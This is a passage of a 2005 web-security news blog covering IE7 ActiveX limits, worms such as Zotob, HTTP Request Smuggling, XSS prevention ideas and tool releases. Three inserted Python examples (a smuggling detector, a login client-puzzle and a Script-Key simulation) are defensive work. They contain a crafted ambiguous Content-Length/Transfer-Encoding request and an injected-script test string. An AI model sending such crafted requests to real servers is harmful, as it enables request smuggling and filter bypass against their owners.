We heard people say that ActiveX controls had too much privilege. In IE7, we made sure that the only ActiveX controls available to IE were the ones intended for use on the internet. Microsoft Windows includes many, many ActiveX controls. For example, an application developer can use IE technology to browse the web inside her application by using a particular ActiveX. While only some ActiveX controls were intended for use inside IE by web sites, many of them identify themselves as available for use inside IE. We decided that allowing ActiveX controls to run in IE should be the exception, not the rule. IE7 will block all ActiveX controls from running in the browser except for controls that were explicitly intended for the browser. That list is under the user’s control. Of course, to keep mainstream web sites running, the most commonly used, clearly intended for the web, ActiveX controls (like Flash) will be on that list by default." - Microsoft

Blog Link: IE7 Security in Brief
09/20/2005 Worm spoofs Google on infected PCs
"P2Load-A modifies the HOSTS file on infected PCs by replacing the original with a file downloaded from a remote website under the control of hackers. When users run a search, the results are normally shown correctly - but sponsored links are different. For some searches, other links appear which have been specified by the creator of this malware, resulting in increased traffic to these websites.

The changes in behaviour happen because users are not getting their results from Google but from a hacker-controlled website based in Germany. P2Load-A also modifies a user's start page. Spanish anti-virus firm Panda reports the page is an almost exact copy of Google, which supports the 17 languages of Google and redirects users even if they make a mistake when entering the address, such as 'wwwgoogle.com'.

"Its [P2Load's] aims are none other than to increase visits to the pages linked by the creator of this malware or earn an income from companies that want to appear in the first few results in computer where the identity of Google has been spoofed," said Luis Corrons, director of PandaLabs. "In both cases, the motivation of the author of this malware is purely financial." " - The Register

Story Link: http://www.theregister.co.uk/2005/09/19/google_spoof_worm/
09/16/2005 Privacy Vulnerabilities in Encrypted HTTP Stream
"Encrypting traffic does not prevent an attacker from performing some types of traffic analysis. We present a straightforward traffic analysis attack against encrypted HTTP streams that is surprisingly effective in identifying the source of the traffic. An attacker starts by creating a profile of the statistical characteristics of web requests from interesting sites, including distributions of packet sizes and inter-arrival times."

Link: http://astalavista.com/index.php?section=directory&cmd=detail&id=5088
09/14/2005 CGISecurity.com Celebrates its 5th birthday
This site started out as a hobby, where after the first year it averaged about 100 unique visitors per month. Years later we now receive well over ten times that number of visitors per day and are growing steadily. Today CGISecurity.com celebrates its 5th birthday, making it the oldest (and still vendor neutral! :) site dedicated solely to Web Application Security (yes, even older than OWASP). To celebrate I've added a section dedicated to Web Application Firewalls (non-commercial). If you know of any decent (non company-sponsored) articles (surprisingly hard to find) on web application firewall methodology, shortcomings, or real world usage please contact us.

I'm also announcing a link partnership program where you can get your site on our links page, as well as rotate in our sponsored link box on the right in exchange for linking to us (On topic security sites only!). Contact us if you wish to learn more about our partnership programs.

You can also subscribe to our RSS newsfeed to get scrolling news in your browser or website. Javascript and HTML news feeds are also available.

For those of you who IRC and would like to chat, feel free to stop by #webappsec on irc.freenode.net (www.freenode.net). If IRC isn't your thing, check out 'The Web Security Mailing List' run by The Web Application Security Consortium (an organization I co-founded in 2004).

Link: Web Application Firewall Page (New)
Link: URL Scan (IIS)
Link: Mod Security (Apache)
09/09/05 My Interview with Astalavista.com
I was recently interviewed for the www.astalavista.com newsletter. That is all.

Interview Link: http://www.astalavista.com/index.php?section=directory&cmd=detail&id=5073
08/29/2005 Preventing Log Evasion in IIS
The Web Application Security Consortium has released a new article titled 'Preventing Log Evasion in IIS'. This paper describes a problem in IIS which allows an attacker to evade certain logging functionality as well as how to fix it.

Link: http://www.webappsec.org/projects/articles/082905.shtml
08/15/2005 (IN)SECURE Magazine Issue 3 released
Mirko Zorz writes

"The third issue of (IN)SECURE, a free digital security magazine published in PDF format, has been released.

The covered topics are:

- The reality of SQL injection
- Security vulnerabilities, exploits and patches
- PDA attacks: palm sized devices - PC sized threats
- Adding service signatures to Nmap
- CSO and CISO - perception vs. reality in the security kingdom
- Unified threat management: IT security's silver bullet?
- 12 months of progress for the Microsoft Security Response Centre
- Interview with Michal Zalewski, security researcher
- OpenSSH for Macintosh
- Method for forensic validation of backup tapes

The magazine can be downloaded from http://www.insecuremag.com."
Link: Got news? Submit it!
08/14/2005 Paros 3.2.4 released
"Paros 3.2.4 is released. This is a maintenance release with essential bug fixes and some user-suggested enhancements. We recommend that all users upgrade. In the meantime we are looking into other user suggestions as well.

The new version is available at http://www.parosproxy.org." - Parosproxy.org

Link: Got news? Submit it!
08/14/2005 Worm in the Wild exploiting MS05-039
A worm has been discovered in the wild exploiting the recent Windows Plug and Play vulnerability (MS05-039).

"A worm started spreading on Sunday using a flaw in the Windows operating system's Plug-and-Play functionality, according to two security groups, who advised users to update systems using a patch released by Microsoft five days ago."

The worm, dubbed Zotob by antivirus firm F-Secure, started spreading early Sunday morning, according to a statement posted by the company. The security firm did not post any additional information about the extent of the digital epidemic, however.

F-Secure's researchers do not believe that the worm will widely infect computer systems.

"Zotob is not going to become another Sasser," F-Secure's researchers said on the virus lab's blog. The worm does not infect computers running Windows XP Service Pack 2 nor Windows 2003, as those systems are somewhat protected against the Windows Plug-and-Play vulnerability. Machines that block port 445 using a firewall will also not be vulnerable, the company said. "As a result, the majority of Windows boxes on the Net won't be hit by (the worm)," the blog stated." - SecurityFocus

Additional information can be found at the links below.

SecurityFocus: http://online.securityfocus.com/news/11281
Microsoft Security Bulletin MS05-039: http://www.microsoft.com/technet/security/Bulletin/MS05-039.mspx
Internet Storm Center: http://isc.sans.org/diary.php?date=2005-08-14
F-Secure Blog: http://www.f-secure.com/weblog/
Slashdot: http://it.slashdot.org/it/05/08/14/147245.shtml?tid=220&tid=172
Link: Got news? Submit it!
08/05/2005 Burp Proxy 1.3 Released
"Burp proxy v1.3beta is now available at http://portswigger.net/proxy/

Burp proxy is an interactive HTTP/S proxy server for attacking and debugging web-enabled applications. It operates as a man-in-the-middle between the end browser and the target Web server, and allows the user to intercept, inspect, and modify the raw traffic passing in both directions." - PortSwigger

Link: Burp Proxy Download Page
Link: Got news? Submit it!
07/25/2005 The Web Application Security Consortium Blackhat meetup
The Web Application Security Consortium is having a get-together this week during the Black Hat conference, which anyone can attend (I'll be there).

"An opportunity to meet other webappsec people to share drinks, appetizers, and interesting conversation in a fun atmosphere. Over three dozen people on the attendee list, which will be our biggest meet-up to date. It's going to be a great time and I look forward to seeing everyone there!"

Place: Shadow Bar at Caesar's

Time: Wed, July 27 @ 6:00pm (Wander down after the final Day 1 talks)
Link: Got news? Submit it!
07/20/2005 Six Unpatched Flaws in Oracle Database Products
"A German database security outfit on Tuesday went public with information on six unpatched vulnerabilities—some rated critical—in Oracle Forms and Oracle Reports, two widely deployed enterprise-facing products.

Red-Database-Security GmbH, a company that specializes in Oracle security audits, warned that the most serious flaw could allow a malicious hacker to use a Web browser to overwrite any file on a vulnerable application server." - eWEEK

""Oracle's behavior not fixing critical security bugs for a long time is not acceptable for their customers," Kornbrust said, warning that long delays in releasing patches "put their customers in danger."

"At least one of these vulnerabilities can be abused from any attacker on the Internet," he added." - eWEEK

Article: http://www.eweek.com/article2/0,1759,1838810,00.asp
Link: Got news? Submit it!
07/18/2005 Flaws in Proxy NTLM HTTP Authentication?
Amit Klein has released a paper describing the risks of proxies that share a TCP connection with a host using NTLM Authentication.

"In connection oriented security, the authentication is associated with the TCP connection, rather than to the individual HTTP requests it transports. As a result, a proxy server that shares a TCP connection to the server among 2 clients may jeopardize the security of the web application by sending a first request (or a set of requests) with authentication/authorization credentials from the first client, followed by a request with no credentials from the second client, and have the web server associate the privileges of the first request with the second request. "

Article: NTLM Authentication and HTTP proxies don't mix
Link: Got news? Submit it!
07/11/2005 DOM Based Cross Site Scripting or XSS of the Third Kind
"Amit Klein has released an article focusing on a little-known variant of Cross Site Scripting which attacks a user's client without sending malicious content to the web server."

Article: http://www.webappsec.org/projects/articles/071105.shtml
Link: Got news? Submit it!
07/09/2005 SQL Injection in USC exposes applicant data
"A programming error in the University of Southern California's online system for accepting applications from prospective students left the personal information of as many as 320,000 users publicly accessible, school officials confirmed on Tuesday."

"The vulnerability in USC's online Web application system is a relatively common and well-known software bug, known as database injection or SQL injection. A lack of security checks on user input allows a hostile user to submit a database command rather than a log-in name. The command could cause the database to send its information back to the attacker or aid the attacker in compromising the computer system hosting the database."

Article Link: http://www.securityfocus.com/news/11239
Link: Got news? Submit it!
07/05/2005 New Version of Jumperz Open Source Web Application Firewall Released
Kanatoko writes

"jumperz_net_076.jar is released.
Available at http://guardian.jumperz.net/index.html?i=003

A new plugin "HRSDetector" is added.
This plugin detects and prevents HRS (HTTP Request Smuggling) attacks.
For more details, see the following URL.
http://guardian.jumperz.net/manual/en/body117.html

And rule "GID2" is updated to call this plugin.
http://guardian.jumperz.net/index.html?i=006&id=GID2
Don't forget to update your rule file."

Link: Got news? Submit it!
06/27/2005 Kavado is no more
"Kavado is shutting because there's no market for stand-alone firewalls, industry sources say.
June 24, 2005

The Israeli data security company Kavado is folding; proof, industry experts say, that there is no market for stand-alone firewalls.

This week, Kavado laid off 20 of its 35 workers at its Rosh Ha'Ayin offices. The only job left for those who remain is to sell off the company's assets and lock up, industry sources said." - Red Herring


Kavado was an application security company offering a web application assessment tool (ScanDo) and an application firewall product (InterDo).

Article: http://redherring.com/Article.aspx?a=12516&hed=Israeli+Firewall+Firm+to+Fold
Link: Got news? Submit it!
06/21/2005 Common Security Problems in the Code of Dynamic Web Applications
Sverre H. Huseby has released a new paper on the Web Application Security Consortium Homepage.

"In the last few years an increasing number of web programmers have started realizing that the code they write for a living plays a major part in the overall security of a web site. Even though the administrators install state of the art firewalls, keep off-the-shelf software patched and protect communication with heavy encryption, there are many ways to attack the logic of the custom-made application code itself.

There is seemingly an infinite number of different logical glitches that may lead to exploitable security problems in a web application. But even though the number of glitches may be infinite, many of the most frequently occurring glitches may be put in one of the following, rather limited set of categories:

* Failure to deal with metacharacters of a subsystem
* Authorization problems due to giving too much trust in input

That's only two categories, and they cover much of the web application security hype published in the last eight years or so." - Sverre

Article Link: http://www.webappsec.org/projects/articles/062105.shtml
Link: Got news? Submit it!
06/13/2005 Paros 3.2.2 released
An anonymous user writes
"This version features a command-line spider, scanning and report generation, export to text file, HTTP state tracking with cookies and an improved spider.
It is available from http://www.parosproxy.org"
Link: Got news? Submit it!
06/12/2005 Book Review: "Apache Security"
I've just completed my review of "Apache Security" by O'Reilly.

"This book was written by Ivan Ristic, the author of the popular Apache web application firewall module mod_security. Naturally this book does discuss how to use mod_security to harden your system, but I'm happy to report it isn't his main area of focus. One of the first things that I do while reviewing a book is to find all the things that the text doesn't cover that it *really* should have and point them out in my review. Simply put this book has everything, and I do mean everything. Here's the low down on a per chapter basis."

Read the entire review:
Link: http://www.cgisecurity.com/articles/apachesecurity.shtml
Link: Got news? Submit it!
06/11/2005 "Meanwhile, on the other side of the web server"
Amit sent a little writeup on the problems that can exist in both client- and server-side HTTP parsing routines to "The Web Security Mailing List".

"The major claim of this write-up is that we should start looking at the communication between the web server and the client. Specifically, we should take a good hard look at the HTTP-aware entities that process the HTTP requests and responses passing to and fro between the client and the server." - Amit

http://www.webappsec.org/lists/websecurity/archive/2005-06/msg00073.html
Link: Got news? Submit it!
06/07/2005 Whitepaper: HTTP Request Smuggling
Ory Segal writes
"We describe a new web entity attack technique, HTTP Request Smuggling. The attack technique and the derived attacks are relevant to most web environments and are the result of an HTTP server's or device's failure to properly handle malformed inbound HTTP requests. HTTP Request Smuggling works by taking advantage of the discrepancies in parsing when one or more HTTP devices/entities (e.g. Cache Server, Proxy Server, Web Application Firewall, etc.) are in the data flow between the user and the web server. HTTP Request Smuggling enables various attacks: web cache poisoning, session hijacking, cross-site scripting and, most seriously, the ability to bypass web application firewall protection. HTTP Request Smuggling sends multiple specially-crafted HTTP requests that cause the two attacked entities to see two different sets of requests, allowing the hacker to smuggle a request to one device without the other device being aware of it. In the Web Cache poisoning attack, this smuggled request will trick the cache server into unintendedly associating a URL to another URL's page (content), and caching this content for the URL. In the Web Application Firewall attack the smuggled request could be a worm (like Nimda or Code Red) or a buffer overflow attack targeting the web server. Finally, because HTTP Request Smuggling enables the attacker to insert or sneak a request into the flow, it allows the attacker to manipulate the web server's request/response sequencing, which can allow for credential hijacking and other malicious outcomes."

Download Link: http://www.watchfire.com/resources/HTTP-Request-Smuggling.pdf
Link: Got news? Submit it!
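A strict framing check of the kind the Jumperz HRSDetector plugin above performs, applied to the parsing discrepancy the Watchfire paper describes: two lenient parsers that trust different headers are shown disagreeing about where a request ends, and a strict check rejects the request before any device behind it has to guess. This is an added example, not code from jumperz.net or Watchfire; the sample requests are constructed and the function names are this example's own.

```python
"""Strict request-framing check of the kind a WAF or proxy needs to rule out
HTTP Request Smuggling. Added example; not code from Watchfire or jumperz.net."""
import re

# Constructed sample: Content-Length (4) and Transfer-Encoding (chunked) give
# two different answers for where the body ends, so two devices in the path
# that each trust a different header see different request boundaries.
AMBIGUOUS = (
    b"POST /search HTTP/1.1\r\n"
    b"Host: shop.example\r\n"
    b"Content-Length: 4\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n"
    b"0\r\n\r\n"
)

# Constructed sample: a single, unambiguous Content-Length framing.
CLEAN = (
    b"POST /search HTTP/1.1\r\n"
    b"Host: shop.example\r\n"
    b"Content-Length: 5\r\n"
    b"\r\n"
    b"q=abc"
)

# RFC 7230 token characters; a header name with a space before the colon
# ("Content-Length : 4") fails this and is treated differently by parsers.
TOKEN = re.compile(rb"^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$")


def parse_head(raw):
    """Return (request_line, [(name, value), ...]) for the first request head."""
    head, sep, _ = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("no end of headers")
    lines = head.split(b"\r\n")
    headers = []
    for line in lines[1:]:
        name, colon, value = line.partition(b":")
        if not colon:
            raise ValueError("header line without colon: %r" % line)
        headers.append((name, value.strip(b" \t")))
    return lines[0], headers


def framing_problems(raw):
    """List every reason a strict front end should reject this request outright.
    An empty list means the body length is defined by exactly one clean rule."""
    try:
        _, headers = parse_head(raw)
    except ValueError as exc:
        return [str(exc)]
    problems = []
    cl = [v for n, v in headers if n.lower() == b"content-length"]
    te = [v for n, v in headers if n.lower() == b"transfer-encoding"]
    for name, _ in headers:
        if not TOKEN.match(name):
            problems.append("malformed header name %r" % name)
    if cl and te:
        problems.append("both Content-Length and Transfer-Encoding present")
    if len(set(cl)) > 1:
        problems.append("conflicting Content-Length values")
    for v in cl:
        if not v.isdigit():
            problems.append("non-numeric Content-Length %r" % v)
    for v in te:
        if v.lower() != b"chunked":
            problems.append("unusual Transfer-Encoding %r" % v)
    return problems


def first_request_end(raw, prefer):
    """Offset at which a lenient parser that trusts `prefer` ("cl" or "te")
    believes the first request ends; bytes after it are 'the next request'."""
    head_end = raw.index(b"\r\n\r\n") + 4
    fields = {n.lower(): v for n, v in parse_head(raw)[1]}
    if prefer == "te" and fields.get(b"transfer-encoding", b"").lower() == b"chunked":
        pos = head_end
        while True:
            line_end = raw.index(b"\r\n", pos)
            size = int(raw[pos:line_end].split(b";")[0], 16)
            pos = line_end + 2 + size + 2          # chunk-size line, data, CRLF
            if size == 0:
                return pos                          # last-chunk plus empty trailer
    return head_end + int(fields.get(b"content-length", b"0"))


def parsers_disagree(raw):
    """True when a Content-Length-first and a chunked-first device would split
    the stream at different points: the precondition for smuggling."""
    return first_request_end(raw, "cl") != first_request_end(raw, "te")


if __name__ == "__main__":
    for label, req in (("ambiguous", AMBIGUOUS), ("clean", CLEAN)):
        print(label, framing_problems(req), "disagree:", parsers_disagree(req))
```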
06/06/2005 Multiple Web Services tools released
An anonymous user writes
"wsPawn - Web services footprinting, discovery, search & domain footprinting tools. If you are looking for registered web services and their access points, this tool will help you in retrieving information from public UDDI.

wsKnight - Web services profiling, proxy and audit tool. This tool helps in profiling web services from its WSDL. It also allows you to invoke methods and intercept them before they go on the wire to the target, so that you can manipulate the SOAP envelope if needed. The autoaudit feature allows you to inject characters and attack strings for assessment work.

wsRook - This is a very simple technology demonstration for developers. This is a regular expression-based defense for web services input content. This is a hook in the HTTP pipe using the HttpModule interface.

Whitepapers are included for a better understanding of all these tools."

Download Link: http://net-square.com/wschess/
Link: Got news? Submit it!

05/26/2005 Nikto 1.35 Available
Sullo writes "Nikto 1.35 is now available for download. This release includes patches from Pavel Kankovsky to support multiple config files and to reduce false positives. It also includes updated databases and several bug fixes.

All users are encouraged to upgrade to the latest version."

Download Link: http://www.cirt.net/code/nikto.shtml
Link: Got news? Submit it!
05/24/2005 AJAX (Asynchronous Javascript and XML) Security Section Added
With the strong interest in AJAX I felt it was time to dedicate a section of the website to it located at http://www.cgisecurity.com/ajax/.

If you feel a certain link is missing please Contact Us
Link: Got news? Submit it!
05/21/2005 Domain Footprinting for Web Applications and Web Security
"A wide array of services, from banking and finance transactions to auctions and ticket reservations, are being offered to customers online. This means that an Internet presence for companies may encompass several domains for each of the different services being offered online.

Performing web application or web services assessment with zero level knowledge for clients can be a daunting task for the web analyst. It is important to locate and footprint all critical domains running web applications or web services.

Web applications are crawled by all popular search engines. Domains running web applications or web services may have some links that may have been cached and archived by these search engines. This considerably simplifies our task. In this paper, we demonstrate how advanced search options offered by search engines like Google, A9, Yahoo, Alexa and others can be leveraged to obtain critical information about domains."

Story Link: http://www.net-security.org/article.php?id=791
Link: Got news? Submit it!
05/07/2005 SQL Server Service Pack 4 released
Microsoft has released SQL Server 2000 Service Pack 4!

Additional Information: http://support.microsoft.com/default.aspx?scid=kb;en-us;290211
Link: Download the Patch
Link: Got news? Submit it!
05/07/2005 SQL Server 2005 Security Article
"It's an increasingly hostile world for your databases and client applications. Every day, attackers develop clever new attacks to compromise your valuable data. Fortunately, SQL Server™ 2005 offers strong new security features that directly address principles such as defense in depth and least privilege. As explained in SQL Server Books Online, Microsoft has implemented a number of security initiatives, which include reducing the attack surface area and making it easier to securely deploy SQL Server and databases, while providing better security tools and docs about maintaining high security in a changing security landscape." - MSDN

Article Link: http://msdn.microsoft.com/msdnmag/issues/05/06/SQLServerSecurity/default.aspx
Link: Got news? Submit it!
05/07/2005 Announcement "The Web Security Mailing List"
I'm proud to be the first to announce a new mailing list whose creation I was a part of, entitled "The Web Security Mailing List". Additional information can be found at the charter link below.

To post a message send an email to: websecurity@webappsec.org
Subscribe by sending email to: websecurity-subscribe@webappsec.org
Unsubscribe by sending email to: websecurity-unsubscribe@webappsec.org

Charter: http://www.webappsec.org/lists/websecurity/
Web Archives: http://www.webappsec.org/lists/websecurity/archive/
Link: Got news? Submit it!
05/04/2005 Incompatible Parameter Parsing
Sverre H. Huseby has an interesting paper on his site regarding the handling of parameter parsing worth checking out.

http://shh.thathost.com/text/incompatible-parameter-parsing.txt
Link: Got news? Submit it!
04/30/2005 Trojan attack exploits Google typos
Just stumbled upon this at theregister.

"Hackers have set up malicious websites designed to infect the Windows boxes of surfers who mistype the name of popular search engine Google.com. If a user opens one of the malicious websites, such as googkle.com1, his PC box may be hijacked with malware including Trojan downloaders, backdoors and spyware." - TheReg

Article Link: http://www.theregister.co.uk/2005/04/29/googkle_trojan/
Link: Got news? Submit it!
04/29/2005 Stopping Automated Attack Tools
Gunter Ollmann releases yet another interesting paper that gets you thinking.

"Paper Abstract:

An almost infinite array of automated tools exist to spider and mirror application content, extract confidential material, brute force guess authentication credentials, discover code-injection flaws, fuzz application variables for exploitable overflows, scan for common files or vulnerable CGI's, and generally attack or exploit web-based application flaws. While of great value to security professionals, the use of these tools by attackers represents a clear and present danger to all organisations. These automated tools have become increasingly popular for attackers seeking to compromise the integrity of online applications, and are used during most phases of an attack. Whilst there are a number of defence techniques which, when incorporated into a web-based application, are capable of stopping even the latest generation of tools, unfortunately most organisations have failed to adopt them.

This whitepaper examines techniques which are capable of defending an application against these tools; providing advice on their particular strengths and weaknesses and proposing solutions capable of stopping the next generation of automated attack tools."

Article Link: http://www.ngssoftware.com/papers/StoppingAutomatedAttackTools.pdf
Link: Got news? Submit it!
04/29/2005 XSS Vulnerabilities: So Underestimated, So Dangerous
I just stumbled upon this new XSS article by hackerscenter.

Article Link: http://www.hackerscenter.com/archive/view.asp?id=2271
Link: Got news? Submit it!
04/18/2005 Apache 2.0.54 Released
"The Apache Software Foundation and The Apache HTTP Server Project are pleased to announce the release of version 2.0.54 of the Apache HTTP Server ("Apache"). This Announcement notes the significant changes in 2.0.54 as compared to 2.0.54. The Announcement is also available in German and Japanese from:

http://www.apache.org/dist/httpd/Announcement2.txt.de
http://www.apache.org/dist/httpd/Announcement2.txt.ja

This version of Apache is principally a bug fix release.

This release is compatible with modules compiled for 2.0.42 and later versions. We consider this release to be the best version of Apache available and encourage users of all prior versions to upgrade.

Apache HTTP Server 2.0.54 is available for download from

http://httpd.apache.org/download.cgi"

Link: Got news? Submit it!
04/07/2005 Database rootkit menace looms
"Crackers are developing more sophisticated techniques for taking over control of corporate databases using malicious code akin to malware already common on Unix platforms. The threat also applies to repository-based software such as CRM systems and web applications, creating a need for new security tools, according to Alexander Kornbrust of Red Database Security."

"Database rootkits would be implemented by either modifying a database object or changing the execution path, for example by creating a local object with the identical name, establishing a synonym pointing to a different object or switching to a different schema. Thereafter Kornbrust showed how it would be possible for a hacker to hide database users or processes he controlled. Most internal packages from Oracle are protected from modifications but Kornbrust emphasised that the threat - although hard to quantify - was real."

- The Register

http://www.theregister.co.uk/2005/04/04/database_rootkit/
Link: Got news? Submit it!

UPDATE: 4/8/2005
Alexander Kornbrust, the author of the paper above, was nice enough to submit a direct link to his paper. Thanks!
Link: http://www.red-database-security.com/wp/db_rootkits_us.pdf

04/03/2005 Anti Brute Force Protection
An anonymous user writes "There's a new paper by Gunter Ollmann at NGS Software which covers a unique method of helping to protect web-based authentication pages from being successfully brute-forced. The paper goes into considerable depth about the use of resource metering techniques that are computationally intensive at the client side, but trivial to verify at the server side - thereby making it difficult (and time consuming) to conduct an automated attack. The paper is located at http://www.ngssoftware.com/papers/NISR-AntiBruteForceResourceMetering.pdf"

Link: Got news? Submit it!
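A client puzzle illustrating the resource-metering idea the paper describes: expensive for the client (about 2^difficulty hashes), one HMAC and one hash for the server to check, with the cost escalating as failed logins for an account accumulate. This is an added example, not the paper's own scheme; the challenge format, the leading-zero-bit criterion, the escalation policy and all names are this example's assumptions.

```python
"""Client puzzle of the resource-metering kind the paper above describes: the
server hands out a challenge that costs the client about 2**difficulty hash
operations to solve but costs the server one HMAC and one hash to verify.
Added example; not the paper's own code. Names, the HMAC-stamped challenge
format and the leading-zero-bits criterion are this example's assumptions."""
import hashlib
import hmac
import os
import time

SERVER_SECRET = os.urandom(32)     # lets the server verify without storing challenges
CHALLENGE_TTL = 120                # seconds a challenge stays valid


def difficulty_for(failed_attempts):
    """Escalate the puzzle cost as failures for an account pile up (assumed policy)."""
    return min(8 + 2 * failed_attempts, 24)


def issue_challenge(username, failed_attempts, now=None):
    """Server: build 'username|issued|difficulty|nonce|tag'. The tag binds the
    other fields under the server secret so a client cannot lower difficulty."""
    if "|" in username:
        raise ValueError("separator not allowed in username")
    now = int(time.time()) if now is None else now
    fields = "%s|%d|%d|%s" % (username, now, difficulty_for(failed_attempts),
                              os.urandom(8).hex())
    tag = hmac.new(SERVER_SECRET, fields.encode(), hashlib.sha256).hexdigest()
    return fields + "|" + tag


def leading_zero_bits(digest):
    """Number of leading zero bits in a byte string."""
    bits = 0
    for byte in digest:
        if byte == 0:
            bits += 8
            continue
        bits += 8 - byte.bit_length()
        break
    return bits


def solve(challenge):
    """Client: brute-force a counter until sha256(challenge|counter) has at least
    `difficulty` leading zero bits. This is the deliberately expensive step."""
    difficulty = int(challenge.split("|")[2])
    counter = 0
    while True:
        digest = hashlib.sha256(("%s|%d" % (challenge, counter)).encode()).digest()
        if leading_zero_bits(digest) >= difficulty:
            return counter
        counter += 1


def verify(challenge, counter, username, now=None):
    """Server: constant, cheap work regardless of difficulty. Returns True only
    if the challenge is authentic, fresh, for this user, and actually solved."""
    now = int(time.time()) if now is None else now
    try:
        user, issued, difficulty, nonce, tag = challenge.split("|")
        issued, difficulty = int(issued), int(difficulty)
    except ValueError:
        return False
    fields = "%s|%d|%d|%s" % (user, issued, difficulty, nonce)
    expected = hmac.new(SERVER_SECRET, fields.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):
        return False                         # forged or altered challenge
    if user != username or not 0 <= now - issued <= CHALLENGE_TTL:
        return False                         # wrong account or expired
    digest = hashlib.sha256(("%s|%d" % (challenge, counter)).encode()).digest()
    return leading_zero_bits(digest) >= difficulty


def expected_client_hashes(failed_attempts):
    """Average hashes a client must compute before its login is even considered."""
    return 2 ** difficulty_for(failed_attempts)


if __name__ == "__main__":
    ch = issue_challenge("alice", failed_attempts=2)
    start = time.time()
    answer = solve(ch)
    print("solved in %.3fs, counter=%d" % (time.time() - start, answer))
    print("verify:", verify(ch, answer, "alice"))
```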
04/03/2005 The "Script Keys" approach to preventing Cross Site Scripting
Yet another XSS prevention idea from Gervase Markham.

"This is the second of my three ideas for the client-side mitigation of Cross-Site Scripting (XSS). It's based on the same principle - that of the site owner specifying which scripts should be permitted and which not - but takes a slightly different approach.

Basically, the idea is that an HTTP header, Script-Key, defines a random string or "key" and only script labelled in some way with that string is allowed to execute. As the string will be different for every page load, injected script would not be correctly labelled and therefore would not be permitted to run." - Gervase

Article Link: http://weblogs.mozillazine.org/gerv/archives/007852.html
Link: Got news? Submit it!
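A small simulation of the Script-Key proposal, added here and not code from Gervase's posting: a server that mints a fresh key per page load, sends it in a Script-Key header and labels its own scripts with it, and a user-agent filter that runs only scripts carrying that key. The `key` attribute used for labelling, the helper names and the sample comment are assumptions of this example.

```python
"""Simulation of the Script-Key idea: the server picks a fresh random key per
page load, sends it in a Script-Key header and labels its own <script>
elements with it; the user agent runs only scripts carrying that key.
Added example with assumed details (the `key` attribute, helper names);
not code from the original proposal."""
import hmac
import secrets
from html.parser import HTMLParser

# Constructed untrusted input: a stored comment containing injected script.
INJECTED_COMMENT = 'Nice site! <script>document.title = "injected"</script>'


def render_page(untrusted_comment):
    """Server side: emit headers and HTML for one page load. The site's own
    script is labelled with the per-load key; the comment is inserted raw, as
    a vulnerable page would, so injected script reaches the client unlabelled."""
    key = secrets.token_urlsafe(24)               # unpredictable, single use
    headers = {"Content-Type": "text/html", "Script-Key": key}
    body = (
        "<html><body>"
        '<script key="%s">renderComments()</script>'
        "<div id=comments>%s</div>"
        "</body></html>" % (key, untrusted_comment)
    )
    return headers, body


class ScriptKeyEnforcer(HTMLParser):
    """User-agent side: collect <script> bodies and decide which may execute."""

    def __init__(self, script_key):
        super().__init__()
        self.script_key = script_key
        self.allowed, self.blocked = [], []
        self._current = None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._current = (dict(attrs).get("key") or "", [])

    def handle_data(self, data):
        if self._current is not None:
            self._current[1].append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._current is not None:
            label, parts = self._current
            code = "".join(parts)
            # constant-time compare, so a label cannot be refined byte by byte
            if self.script_key and hmac.compare_digest(
                    label.encode(), self.script_key.encode()):
                self.allowed.append(code)
            else:
                self.blocked.append(code)
            self._current = None


def load_page(headers, body):
    """Parse one response as a Script-Key-aware user agent would and return
    (scripts_that_ran, scripts_that_were_blocked)."""
    enforcer = ScriptKeyEnforcer(headers.get("Script-Key", ""))
    enforcer.feed(body)
    enforcer.close()
    return enforcer.allowed, enforcer.blocked


def stale_key_is_rejected():
    """The key changes on every load, so a key observed in an earlier response
    cannot correctly label a script injected into a later one."""
    old_headers, _ = render_page("first load")
    stale = old_headers["Script-Key"]
    payload = '<script key="%s">/* stale label */</script>' % stale
    headers, body = render_page(payload)
    ran, blocked = load_page(headers, body)
    return len(ran) == 1 and len(blocked) == 1


if __name__ == "__main__":
    h, b = render_page(INJECTED_COMMENT)
    ran, blocked = load_page(h, b)
    print("ran:", ran)
    print("blocked:", blocked)
    print("stale key rejected:", stale_key_is_rejected())
```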
04/02/2005 A Proposal to prevent Cross Site Scripting Attacks
"The perfect way to prevent cross-site scripting (XSS) attacks would be for the user agent to read the website designer's mind to determine which scripts embedded in a page were legitimate and which were malicious. In the absence of affordable and reliable mind-reading technology, and in consideration of the mental fatigue this would undoubtedly induce in web page authors, this paper presents a way for a site designer to explain his state of mind to the user agent by specifying restrictions on the capabilities of his content." - gerv

Article Link: http://www.gerv.net/security/content-restrictions/
Link: Got news? Submit it!
03/23/2005 Millions of Pages Google Hijacked via Open Directory feed
"Like many webmasters I was a bit too relaxed about 302 hijacks, until I started digging into who was hijacking my pages and how could I remove them. I have now discovered that this problem is numerically out of control, with millions of 302s out there. And boy, am I angry. If you have a Dmoz link, check for 302s - obviously Google have to have indexed the page that's 302ing you, for it to be a problem. Maybe it's my fault for having lots of Dmoz links!" - threadwatch

Article Link: http://www.threadwatch.org/node/2002
Link: Got news? Submit it!
03/22/2005 Microsoft releases "Security Development Lifecycle" paper
Michael Howard sent the following email to the bugtraq mailing list today.

"Microsoft has made publicly available our Security Development Lifecycle (SDL) paper at http://msdn.microsoft.com/security/sdl

The SDL is the process that Microsoft has implemented for the development of software that needs to withstand malicious attack. The process encompasses the addition of a series of security-focused activities and deliverables to each of the phases of Microsoft's software development process. These activities and deliverables include the development of threat models during software design, the use of static analysis code-scanning tools during implementation, and the conduct of code reviews and security testing during a focused "security push". Before software developed under the SDL can be released, it must undergo a Final Security Review by a team independent from its development group. When compared to software that has not been subject to the SDL, software that has undergone the SDL has experienced a significantly reduced rate of external discovery of security vulnerabilities. This paper describes the SDL and discusses experience with its implementation across Microsoft software.

Cheers, Michael"

Article Link: http://msdn.microsoft.com/security/sdl
Link: Got news? Submit it!
03/17/2005 New google site shut down by Apple?
"Google has unceremoniously, and without comment, yanked its latest labs "project" after less than twenty-four hours. In 'Google X' a software engineer had replaced the main text navigation bar on the Google home page with a Mac OS X-style dock. A row of eight icons zoomed and shrank as the mouse hovered over them, the row itself shuffling to make room for the expansion - exactly like Mac OS X's dock." - The Register

I saw this before it went down and it was pretty neat. Hopefully they will bring it back.

